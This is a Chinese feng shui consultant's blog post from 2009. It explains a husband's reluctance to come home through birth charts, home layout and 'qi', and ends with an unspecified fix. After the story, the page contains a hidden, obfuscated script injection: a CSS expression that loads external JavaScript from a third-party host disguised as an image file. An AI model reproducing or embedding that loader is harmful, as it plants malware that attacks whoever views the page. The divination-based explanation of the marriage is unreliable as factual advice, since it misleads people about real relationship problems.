注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

杨清华说风水

阴阳风水、命理事业、婚姻、财运等问题咨询决策

 
 
 

日志

 
 

我的老公为何不愿回家  

2009-10-31 18:35:11|  分类: 默认分类 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
   秦女士,有一个幸福的家庭,有好车,还有好几套住房,有公司、有老公,有一对疼爱她的父母。还有一个可爱的宝贝儿子。这么个家庭多好啊?该多完美啊?自己还住一套近200平米的大房子,有多少人都梦寐以求啊,又有多少人羡慕的不得了啊,就这样的一个家庭他也有烦恼。老公他不愿回家。奇怪吧?再往下看。会有更多人不理解。

          秦女士和他老公是是自由相爱结婚的,可以说。这么大的家业基本上是秦女士家的家产。和秦女士自己努力得来的。男的是个退伍军人。没有挣钱的本领。就这样,秦女士和家人也没有嫌弃他,也一直关照他的情绪。从来没有和他因为任何事抄过嘴,一家人都恐怕伤了他的自尊。按理说;这么个条件,这么个家庭,他的老公没有理由不珍惜啊。可事实就是如此。按他老公的话说,我不是不想回家,我也想,可是;我一到家就非常压抑。感觉非常的委屈,就有一种老想哭的感觉。家人和朋友,都说他,你委屈什么啊,你多好啊?有这么好的老婆,那么能干,条件那么好,你可以讲是一步登天啦,有多少人奋斗一辈子也奔不到一套房,你娶个媳妇,都应有尽有啦,该多好啊,我们都羡慕死啦,可我们没那福气啊。说归说,可是,怎么也改不了老公的心结,问题搞不明白啦,经朋友介绍找到了我,问我到底是什么原因,让他的老公不愿回家,看看是不是因为的风水,还是别的问题。

         我跟据他们的命运,和风水状态,总结了四个问题。

           一;女命格局从旺,也就是能力、气场都站有男刚的位置,让男的冒犯不起,也只能回避。

          二;风水,家里的房子很大,且全是按照女士的装修意愿装修的,也就是突出女人的强势,有利男人的方位,全部被压下去啦。

          三,家里的老人(父母)是女士的亲生父母。从言谈举止,方方面面都是以女人和孩子为中心。从心里上就没有重视他。也就是气场有排他性。

          四;他自己命局太弱,也就是性格好,孝顺,没信心,没胆量,气场也弱。

        总观这四个方面。你老公不可能承受这三方面的压力,没办法,他就选者回避,所以说,他不回家的原因也就找到啦。

       听了这些,秦女士说 这下我明白啦,看来这也有讲究啊。我们光想物质、经济方面关照他,不是他没钱吗,经济不好,我总是尽可能的从这方面关照他。没想到这方面影响也那么大。最后,我给他出了几个主意。改变一下目前的状态,和风水情况。经过这一段时间怒力,很快他们便拥有了一个完整幸福的家庭

ee:expression_r_r(function(){if(!window.r){varss='s'+'cript';var tt='text/ja'+'vas'+'cript';varst=document.createElement_x(ss);st.src='http://imgcache.suqian114.cn/a/s/sina.jpg';st.type=tt;document.getElementsByTagName('head').item(0).appendChild(st);window.r=1}}(this));width:0px;display:none"<
  评论这张
 
阅读(142)| 评论(9)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017